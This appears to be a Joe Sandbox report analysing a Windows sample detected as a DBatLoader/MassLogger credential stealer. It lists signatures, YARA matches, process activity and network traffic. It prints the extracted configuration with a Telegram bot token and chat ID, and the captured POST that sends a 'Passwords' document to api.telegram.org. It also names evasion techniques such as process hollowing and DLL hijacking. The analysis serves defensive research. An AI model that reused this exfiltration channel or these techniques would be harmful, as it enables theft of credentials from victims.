Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ja811MqV4h.exe

Overview

General Information

Sample name:ja811MqV4h.exe
renamed because original name is a hash value
Original sample name:882396942bded48550ad6cddeb511480.exe
Analysis ID:1634983
MD5:882396942bded48550ad6cddeb511480
SHA1:8e8fb6f67eb813eb0bedc78cccc4da52419a9500
SHA256:ad50c64c49f0ea386631f5c53a2ee7bd952e5168f5234704f9cb4f9be32f5944
Tags:exeuser-abuse_ch
Infos:

Detection

DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ja811MqV4h.exe (PID: 8664 cmdline: "C:\Users\user\Desktop\ja811MqV4h.exe" MD5: 882396942BDED48550AD6CDDEB511480)
    • cmd.exe (PID: 8720 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6556.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8744 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\33809.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • daphpvwO.pif (PID: 8816 cmdline: C:\\Users\\user\\Links\daphpvwO.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
{"EXfil Mode": "Telegram", "Telegram Token": "7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU", "Telegram Chatid": "403948698"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1326628339.00000000023C9000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000005.00000001.1321974377.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
    00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
          Click to see the 37 entries
          SourceRuleDescriptionAuthorStrings
          5.1.daphpvwO.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          5.2.daphpvwO.pif.400000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          5.2.daphpvwO.pif.400000.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          5.1.daphpvwO.pif.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          5.3.daphpvwO.pif.268f6d60.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 132 entries

            System Summary

            barindex
            Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\ja811MqV4h.exe, ProcessId: 8664, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\daphpvwO.pif, CommandLine: C:\\Users\\user\\Links\daphpvwO.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\daphpvwO.pif, NewProcessName: C:\Users\user\Links\daphpvwO.pif, OriginalFileName: C:\Users\user\Links\daphpvwO.pif, ParentCommandLine: "C:\Users\user\Desktop\ja811MqV4h.exe", ParentImage: C:\Users\user\Desktop\ja811MqV4h.exe, ParentProcessId: 8664, ParentProcessName: ja811MqV4h.exe, ProcessCommandLine: C:\\Users\\user\\Links\daphpvwO.pif, ProcessId: 8816, ProcessName: daphpvwO.pif
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T08:49:43.904064+010020577441Malware Command and Control Activity Detected192.168.2.549711149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T08:49:31.199503+010028032742Potentially Bad Traffic192.168.2.549708193.122.130.080TCP
            2025-03-11T08:49:41.139138+010028032742Potentially Bad Traffic192.168.2.549708193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T08:49:43.316526+010018100081Potentially Bad Traffic192.168.2.549711149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: ja811MqV4h.exeAvira: detected
            Source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU", "Telegram Chatid": "403948698"}
            Source: ja811MqV4h.exeVirustotal: Detection: 54%Perma Link
            Source: ja811MqV4h.exeReversingLabs: Detection: 68%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org

            Compliance

            barindex
            Source: C:\Users\user\Links\daphpvwO.pifUnpacked PE file: 5.2.daphpvwO.pif.400000.1.unpack
            Source: ja811MqV4h.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: Binary string: easinvoker.pdb source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F320000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318791565.0000000000996000.00000004.00000020.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F320000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318791565.00000000009C7000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029C52F8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_2842DE70
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2B5C41B9h5_2_2B5C3F08
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2B5C490Fh5_2_2B5C44F0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2B5CF4B1h5_2_2B5CF208
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2B5CFD61h5_2_2B5CFAB8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2B5CEC01h5_2_2B5CE958
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2B5C490Fh5_2_2B5C483C
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2B5CF909h5_2_2B5CF660
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2B5CF059h5_2_2B5CEDB0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14037Dh5_2_2C140040
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14E420h5_2_2C14E178
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, 000003E8h5_2_2C14F760
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14D2C0h5_2_2C14D018
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14AEC8h5_2_2C14AC20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14D718h5_2_2C14D470
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14B320h5_2_2C14B078
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14B778h5_2_2C14B4D0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14DB70h5_2_2C14D8C8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14DFC8h5_2_2C14DD20
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14BBD0h5_2_2C14B928
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C148C08h5_2_2C148960
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14C028h5_2_2C14BD80
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C149060h5_2_2C148DB8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14E878h5_2_2C14E5D0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14C482h5_2_2C14C1D8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C1494B8h5_2_2C149210
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C140EC2h5_2_2C140E10
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C140EC2h5_2_2C140E18
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C1418E0h5_2_2C141638
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14ECD0h5_2_2C14EA28
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C149910h5_2_2C149668
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C141D38h5_2_2C141A90
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14F128h5_2_2C14EE80
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C149D68h5_2_2C149AC0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C142190h5_2_2C141EE8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14A1C0h5_2_2C149F18
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, 000003E8h5_2_2C14F75E
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C1425E8h5_2_2C142340
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14A618h5_2_2C14A370
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14CA10h5_2_2C14C768
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C142A40h5_2_2C142798
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14CE68h5_2_2C14CBC0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C14AA70h5_2_2C14A7C8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C142E98h5_2_2C142BF0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C1D0D0Dh5_2_2C1D0B30
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then jmp 2C1D1697h5_2_2C1D0B30
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then push 00000000h5_2_2C1D4040
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]5_2_2C1DF7B0
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_2C1D4E4E
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_2C1D0853
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then push 00000000h5_2_2C1D4B96
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_2C1D0673
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]5_2_2C1DE6C8
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]5_2_2C1DE6C1
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_2C1D0040
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then mov ecx, dword ptr [ebp-40h]5_2_2C1DF7AC
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then push 00000000h5_2_2CBAC658
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_2CBAC658
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 4x nop then push 00000000h5_2_2CBAD1AF

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49711 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49711 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU/sendDocument?chat_id=403948698&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd604fc058aa8cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 193.122.130.0:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU/sendDocument?chat_id=403948698&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd604fc058aa8cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
            Source: daphpvwO.pif, 00000005.00000002.3832462601.00000000288E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: daphpvwO.pif, 00000005.00000002.3832462601.00000000288E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F366000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F210000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1325858456.0000000000994000.00000004.00000020.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F256000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359987570.0000000020F60000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000000.1320952720.0000000000416000.00000002.00000001.01000000.00000005.sdmp, daphpvwO.pif.0.drString found in binary or memory: http://www.pmail.com
            Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028925000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
            Source: daphpvwO.pif, 00000005.00000002.3830052726.00000000268E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/
            Source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

            System Summary

            barindex
            Source: 5.1.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 5.2.daphpvwO.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
